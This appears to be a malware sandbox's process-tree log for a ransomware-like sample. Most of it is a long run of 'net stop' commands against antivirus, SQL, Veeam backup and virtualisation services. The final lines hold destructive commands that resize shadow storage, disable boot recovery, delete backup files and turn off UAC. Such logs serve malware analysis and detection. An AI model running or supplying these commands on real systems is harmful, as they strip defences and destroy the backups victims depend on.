-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "sacsvr"2⤵PID:1520
-
C:\Windows\system32\net.exenet stop "sacsvr"3⤵PID:1240
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "sacsvr"4⤵PID:1560
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SamSs"2⤵PID:1740
-
C:\Windows\system32\net.exenet stop "SamSs"3⤵PID:1564
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs"4⤵PID:1716
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SAVAdminService"2⤵PID:1584
-
C:\Windows\system32\net.exenet stop "SAVAdminService"3⤵PID:1688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVAdminService"4⤵PID:1728
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SAVService"2⤵PID:1968
-
C:\Windows\system32\net.exenet stop "SAVService"3⤵PID:1712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVService"4⤵PID:240
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Smcinst"2⤵PID:840
-
C:\Windows\system32\net.exenet stop "Smcinst"3⤵PID:976
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Smcinst"4⤵PID:1176
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SmcService"2⤵PID:860
-
C:\Windows\system32\net.exenet stop "SmcService"3⤵PID:1008
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SmcService"4⤵PID:640
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SMTPSvc"2⤵PID:784
-
C:\Windows\system32\net.exenet stop "SMTPSvc"3⤵PID:980
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SMTPSvc"4⤵PID:1544
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SNAC"2⤵PID:1536
-
C:\Windows\system32\net.exenet stop "SNAC"3⤵PID:1112
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SNAC"4⤵PID:1336
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SntpService"2⤵PID:2040
-
C:\Windows\system32\net.exenet stop "SntpService"3⤵PID:1236
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SntpService"4⤵PID:1064
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "sophossps"2⤵PID:1324
-
C:\Windows\system32\net.exenet stop "sophossps"3⤵PID:1952
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "sophossps"4⤵PID:1264
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$BKUPEXEC"2⤵PID:1744
-
C:\Windows\system32\net.exenet stop "SQLAgent$BKUPEXEC"3⤵PID:1148
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC"4⤵PID:1972
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$ECWDB2"2⤵PID:2012
-
C:\Windows\system32\net.exenet stop "SQLAgent$ECWDB2"3⤵PID:1676
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$ECWDB2"4⤵PID:1732
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEBGC"2⤵PID:1224
-
C:\Windows\system32\net.exenet stop "SQLAgent$PRACTTICEBGC"3⤵PID:1504
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC"4⤵PID:1956
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEMGT"2⤵PID:1932
-
C:\Windows\system32\net.exenet stop "SQLAgent$PRACTTICEMGT"3⤵PID:1708
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT"4⤵PID:1416
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROFXENGAGEMENT"2⤵PID:1944
-
C:\Windows\system32\net.exenet stop "SQLAgent$PROFXENGAGEMENT"3⤵PID:1040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT"4⤵PID:1508
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SBSMONITORING"2⤵PID:868
-
C:\Windows\system32\net.exenet stop "SQLAgent$SBSMONITORING"3⤵PID:1164
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING"4⤵PID:1600
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SHAREPOINT"2⤵PID:1436
-
C:\Windows\system32\net.exenet stop "SQLAgent$SHAREPOINT"3⤵PID:1516
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT"4⤵PID:1344
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQL_2008"2⤵PID:628
-
C:\Windows\system32\net.exenet stop "SQLAgent$SQL_2008"3⤵PID:580
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SQL_2008"4⤵PID:1560
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SYSTEM_BGC"2⤵PID:1240
-
C:\Windows\system32\net.exenet stop "SQLAgent$SYSTEM_BGC"3⤵PID:1520
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC"4⤵PID:1716
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPS"2⤵PID:1564
-
C:\Windows\system32\net.exenet stop "SQLAgent$TPS"3⤵PID:1740
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$TPS"4⤵PID:1728
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPSAMA"2⤵PID:1688
-
C:\Windows\system32\net.exenet stop "SQLAgent$TPSAMA"3⤵PID:1584
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$TPSAMA"4⤵PID:240
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"2⤵PID:1712
-
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2008R2"3⤵PID:1968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"4⤵PID:1176
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2012"2⤵PID:976
-
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2012"3⤵PID:840
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012"4⤵PID:640
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLBrowser"2⤵PID:1008
-
C:\Windows\system32\net.exenet stop "SQLBrowser"3⤵PID:860
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLBrowser"4⤵PID:1544
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLSafeOLRService"2⤵PID:980
-
C:\Windows\system32\net.exenet stop "SQLSafeOLRService"3⤵PID:784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLSafeOLRService"4⤵PID:1336
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLSERVERAGENT"2⤵PID:1112
-
C:\Windows\system32\net.exenet stop "SQLSERVERAGENT"3⤵PID:1536
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLSERVERAGENT"4⤵PID:1064
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY"2⤵PID:1236
-
C:\Windows\system32\net.exenet stop "SQLTELEMETRY"3⤵PID:2040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLTELEMETRY"4⤵PID:1264
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY$ECWDB2"2⤵PID:1952
-
C:\Windows\system32\net.exenet stop "SQLTELEMETRY$ECWDB2"3⤵PID:1324
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2"4⤵PID:1972
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLWriter"2⤵PID:1148
-
C:\Windows\system32\net.exenet stop "SQLWriter"3⤵PID:1744
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLWriter"4⤵PID:1732
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SstpSvc"2⤵PID:1676
-
C:\Windows\system32\net.exenet stop "SstpSvc"3⤵PID:2012
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc"4⤵PID:1956
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "svcGenericHost"2⤵PID:1504
-
C:\Windows\system32\net.exenet stop "svcGenericHost"3⤵PID:1224
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "svcGenericHost"4⤵PID:1416
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "tmlisten"2⤵PID:1708
-
C:\Windows\system32\net.exenet stop "tmlisten"3⤵PID:1932
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "tmlisten"4⤵PID:1508
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "TrueKey"2⤵PID:1040
-
C:\Windows\system32\net.exenet stop "TrueKey"3⤵PID:1944
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "TrueKey"4⤵PID:1600
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "UI0Detect"2⤵PID:1164
-
C:\Windows\system32\net.exenet stop "UI0Detect"3⤵PID:868
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect"4⤵PID:1592
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamBackupSvc"2⤵PID:1412
-
C:\Windows\system32\net.exenet stop "VeeamBackupSvc"3⤵PID:1804
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamBackupSvc"4⤵PID:984
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamBrokerSvc"2⤵PID:1492
-
C:\Windows\system32\net.exenet stop "VeeamBrokerSvc"3⤵PID:1048
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamBrokerSvc"4⤵PID:1608
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamCatalogSvc"2⤵PID:1696
-
C:\Windows\system32\net.exenet stop "VeeamCatalogSvc"3⤵PID:1648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamCloudSvc"2⤵PID:2028
-
C:\Windows\system32\net.exenet stop "VeeamCloudSvc"3⤵PID:1320
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamCloudSvc"4⤵PID:316
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamDeploymentService"2⤵PID:1144
-
C:\Windows\system32\net.exenet stop "VeeamDeploymentService"3⤵PID:1168
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamDeploymentService"4⤵PID:1632
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamDeploySvc"2⤵PID:1692
-
C:\Windows\system32\net.exenet stop "VeeamDeploySvc"3⤵PID:1604
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamDeploySvc"4⤵PID:1748
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamEnterpriseManagerSvc"2⤵PID:964
-
C:\Windows\system32\net.exenet stop "VeeamEnterpriseManagerSvc"3⤵PID:636
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc"4⤵PID:1500
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamMountSvc"2⤵PID:1160
-
C:\Windows\system32\net.exenet stop "VeeamMountSvc"3⤵PID:1936
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamMountSvc"4⤵PID:364
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamNFSSvc"2⤵PID:1100
-
C:\Windows\system32\net.exenet stop "VeeamNFSSvc"3⤵PID:960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamNFSSvc"4⤵PID:2020
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamRESTSvc"2⤵PID:1428
-
C:\Windows\system32\net.exenet stop "VeeamRESTSvc"3⤵PID:516
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamRESTSvc"4⤵PID:1056
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamTransportSvc"2⤵PID:1780
-
C:\Windows\system32\net.exenet stop "VeeamTransportSvc"3⤵PID:472
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamTransportSvc"4⤵PID:1792
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "W3Svc"2⤵PID:2036
-
C:\Windows\system32\net.exenet stop "W3Svc"3⤵PID:1672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "W3Svc"4⤵PID:1796
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "wbengine"2⤵PID:1940
-
C:\Windows\system32\net.exenet stop "wbengine"3⤵PID:560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine"4⤵PID:1844
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "WRSVC"2⤵PID:1668
-
C:\Windows\system32\net.exenet stop "WRSVC"3⤵PID:1784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WRSVC"4⤵PID:556
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"2⤵PID:1948
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2008R2"3⤵PID:1680
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"4⤵PID:1400
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"2⤵PID:968
-
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2008R2"3⤵PID:1060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"4⤵PID:700
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamHvIntegrationSvc"2⤵PID:1944
-
C:\Windows\system32\net.exenet stop "VeeamHvIntegrationSvc"3⤵PID:1040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamHvIntegrationSvc"4⤵PID:1592
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "swi_update"2⤵PID:868
-
C:\Windows\system32\net.exenet stop "swi_update"3⤵PID:1164
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "swi_update"4⤵PID:984
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$CXDB"2⤵PID:1804
-
C:\Windows\system32\net.exenet stop "SQLAgent$CXDB"3⤵PID:1412
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$CXDB"4⤵PID:1608
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$CITRIX_METAFRAME"2⤵PID:1048
-
C:\Windows\system32\net.exenet stop "SQLAgent$CITRIX_METAFRAME"3⤵PID:1492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME"4⤵PID:1432
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQL Backups"2⤵PID:1648
-
C:\Windows\system32\net.exenet stop "SQL Backups"3⤵PID:1696
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQL Backups"4⤵PID:316
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PROD"2⤵PID:1320
-
C:\Windows\system32\net.exenet stop "MSSQL$PROD"3⤵PID:2028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PROD"4⤵PID:1632
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Zoolz 2 Service"2⤵PID:1168
-
C:\Windows\system32\net.exenet stop "Zoolz 2 Service"3⤵PID:1144
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Zoolz 2 Service"4⤵PID:1748
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper"2⤵PID:1604
-
C:\Windows\system32\net.exenet stop "MSSQLServerADHelper"3⤵PID:1692
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLServerADHelper"4⤵PID:1500
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROD"2⤵PID:636
-
C:\Windows\system32\net.exenet stop "SQLAgent$PROD"3⤵PID:964
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PROD"4⤵PID:364
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "msftesql$PROD"2⤵PID:1936
-
C:\Windows\system32\net.exenet stop "msftesql$PROD"3⤵PID:1160
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "msftesql$PROD"4⤵PID:2020
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "NetMsmqActivator"2⤵PID:960
-
C:\Windows\system32\net.exenet stop "NetMsmqActivator"3⤵PID:1100
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator"4⤵PID:1056
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "EhttpSrv"2⤵PID:516
-
C:\Windows\system32\net.exenet stop "EhttpSrv"3⤵PID:1428
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "EhttpSrv"4⤵PID:1792
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ekrn"2⤵PID:472
-
C:\Windows\system32\net.exenet stop "ekrn"3⤵PID:1780
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ekrn"4⤵PID:1796
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ESHASRV"2⤵PID:1672
-
C:\Windows\system32\net.exenet stop "ESHASRV"3⤵PID:2036
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ESHASRV"4⤵PID:1844
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SOPHOS"2⤵PID:560
-
C:\Windows\system32\net.exenet stop "MSSQL$SOPHOS"3⤵PID:1940
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SOPHOS"4⤵PID:556
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SOPHOS"2⤵PID:1784
-
C:\Windows\system32\net.exenet stop "SQLAgent$SOPHOS"3⤵PID:1668
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SOPHOS"4⤵PID:1400
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AVP"2⤵PID:1680
-
C:\Windows\system32\net.exenet stop "AVP"3⤵PID:1948
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AVP"4⤵PID:700
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "klnagent"2⤵PID:1932
-
C:\Windows\system32\net.exenet stop "klnagent"3⤵PID:1388
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "klnagent"4⤵PID:1344
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SQLEXPRESS"2⤵PID:848
-
C:\Windows\system32\net.exenet stop "MSSQL$SQLEXPRESS"3⤵PID:1436
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS"4⤵PID:1560
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQLEXPRESS"2⤵PID:436
-
C:\Windows\system32\net.exenet stop "SQLAgent$SQLEXPRESS"3⤵PID:628
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS"4⤵PID:1716
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "wbengine"2⤵PID:1516
-
C:\Windows\system32\net.exenet stop "wbengine"3⤵PID:1240
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine"4⤵PID:1728
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "HvHost"2⤵PID:580
-
C:\Windows\system32\net.exenet stop "HvHost"3⤵PID:1564
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "HvHost"4⤵PID:240
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmickvpexchange"2⤵PID:1520
-
C:\Windows\system32\net.exenet stop "vmickvpexchange"3⤵PID:1688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmickvpexchange"4⤵PID:1176
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicguestinterface"2⤵PID:1740
-
C:\Windows\system32\net.exenet stop "vmicguestinterface"3⤵PID:1712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicguestinterface"4⤵PID:640
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicshutdown"2⤵PID:1584
-
C:\Windows\system32\net.exenet stop "vmicshutdown"3⤵PID:976
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicshutdown"4⤵PID:1544
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicheartbeat"2⤵PID:1968
-
C:\Windows\system32\net.exenet stop "vmicheartbeat"3⤵PID:1008
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicheartbeat"4⤵PID:964
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmcompute"2⤵PID:636
-
C:\Windows\system32\net.exenet stop "vmcompute"3⤵PID:2020
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmcompute"4⤵PID:1160
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicvmsession"2⤵PID:1936
-
C:\Windows\system32\net.exenet stop "vmicvmsession"3⤵PID:1056
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvmsession"4⤵PID:1100
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicrdv"2⤵PID:960
-
C:\Windows\system32\net.exenet stop "vmicrdv"3⤵PID:1792
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicrdv"4⤵PID:1428
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmictimesync"2⤵PID:516
-
C:\Windows\system32\net.exenet stop "vmictimesync"3⤵PID:1796
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmictimesync"4⤵PID:1780
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicvss"2⤵PID:472
-
C:\Windows\system32\net.exenet stop "vmicvss"3⤵PID:1844
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss"4⤵PID:2036
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMAuthdService"2⤵PID:1672
-
C:\Windows\system32\net.exenet stop "VMAuthdService"3⤵PID:556
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMAuthdService"4⤵PID:1940
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMnetDHCP"2⤵PID:560
-
C:\Windows\system32\net.exenet stop "VMnetDHCP"3⤵PID:1400
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMnetDHCP"4⤵PID:1668
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMware NAT Service"2⤵PID:1784
-
C:\Windows\system32\net.exenet stop "VMware NAT Service"3⤵PID:700
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMware NAT Service"4⤵PID:1948
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMUSBArbService"2⤵PID:1040
-
C:\Windows\system32\net.exenet stop "VMUSBArbService"3⤵PID:1592
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMUSBArbService"4⤵PID:968
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMwareHostd"2⤵PID:1164
-
C:\Windows\system32\net.exenet stop "VMwareHostd"3⤵PID:984
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMwareHostd"4⤵PID:1944
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sense"2⤵PID:1412
-
C:\Windows\system32\net.exenet stop "Sense"3⤵PID:1608
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sense"4⤵PID:868
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "WdNisSvc"2⤵PID:1492
-
C:\Windows\system32\net.exenet stop "WdNisSvc"3⤵PID:1432
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WdNisSvc"4⤵PID:1804
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "WinDefend"2⤵PID:1696
-
C:\Windows\system32\net.exenet stop "WinDefend"3⤵PID:316
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WinDefend"4⤵PID:1048
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1648
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No2⤵PID:1748
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1168
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q C:\*.bac C:\*.bak C:\*.bkf C:\Backup*.* C:\backup*.*2⤵PID:964
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1008
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f2⤵PID:1064
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
PID:980
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f2⤵PID:784
-
